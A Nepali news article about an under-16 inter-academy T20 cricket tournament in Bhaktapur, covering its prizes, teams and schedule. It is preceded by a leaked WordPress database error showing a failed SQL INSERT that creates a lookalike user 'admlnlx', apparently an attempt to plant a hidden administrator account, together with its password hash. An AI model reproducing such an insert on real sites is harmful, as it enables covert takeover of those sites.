WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bccd4xckqRnRixkZopz2SLjBygX8/i.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 11:14:40', '', 'admlnlx', 'admlnlx')
भक्तपुर, फागुन ५ –
नेक्सस क्रिक्रेट एकेडेमीले नेक्सस कप अण्डर १६ अन्तर एकेडेमी ट्वेन्टी ट्वेन्टी राष्ट्रिय क्रिक्रेट प्रतियोगिताको आयोजना गर्ने भएको छ ।
बिहीबार रफत संचार क्लबमा एकेडेमीले आयोजना गरेको पत्रकार सम्मेलनमा यसबारे जानकारी दिँदै प्रतियोगिता मूल आयोजक समितिका संयोजक भरतकुमार शाहीले प्रतियोगिता लिग तथा नकआउटको आधारमा सञ्चालन हुने बताउनुभयो ।
उहाँका अनुसार प्रतियोगितामा देशभर रहेका निजी तथा सामुदायिकस्तरबाट सञ्चालित क्रिक्रेट एकेडेमी तथा क्लबहरु मध्येबाट ३२ टिमका ४ सय ४८ खेलाडीहरुको सहभागिता रहने बताउनुभयो ।
प्रतियोगिता विजेता टिमलाई १ लाख ५० हजार र उपविजेतालाई १ लाख रुपैयाँ पुरस्कार दिइने छ । त्यसैगरि म्यान अफ द सिरिजलाई २० हजार, ईमरजिङ्ग खेलाडीलाई १५ हजार, उत्कृष्ट बलरलाई १० हजार, उत्कृष्ट ब्याट्स्म्यानलाई १० हजार रुपैयाँसहितको पुरस्कार प्रदान गरिने आयोजकले जनाएको छ ।
जम्मा ५८ लाख रुपैयाँको लागतमा सम्पन्न हुने प्रतियोगितामा कक्षा ८ को जिल्लास्तरीय परीक्षा उतीर्ण भएका व्यक्तिहरु मात्र सहभागि हुन पाउनेछन् ।
प्रतियोगिता आगामी चैत्र १५ गतेदेखि वैशाख ५ गतेसम्म भक्तपुरको सैनिक आवासीय उमाविको खेलमैदान लगायत तीन ठाउँमा हुने प्रतियोगिताका सहसंयोजक विजयकुमार शर्माले जानकारी दिनुभयो ।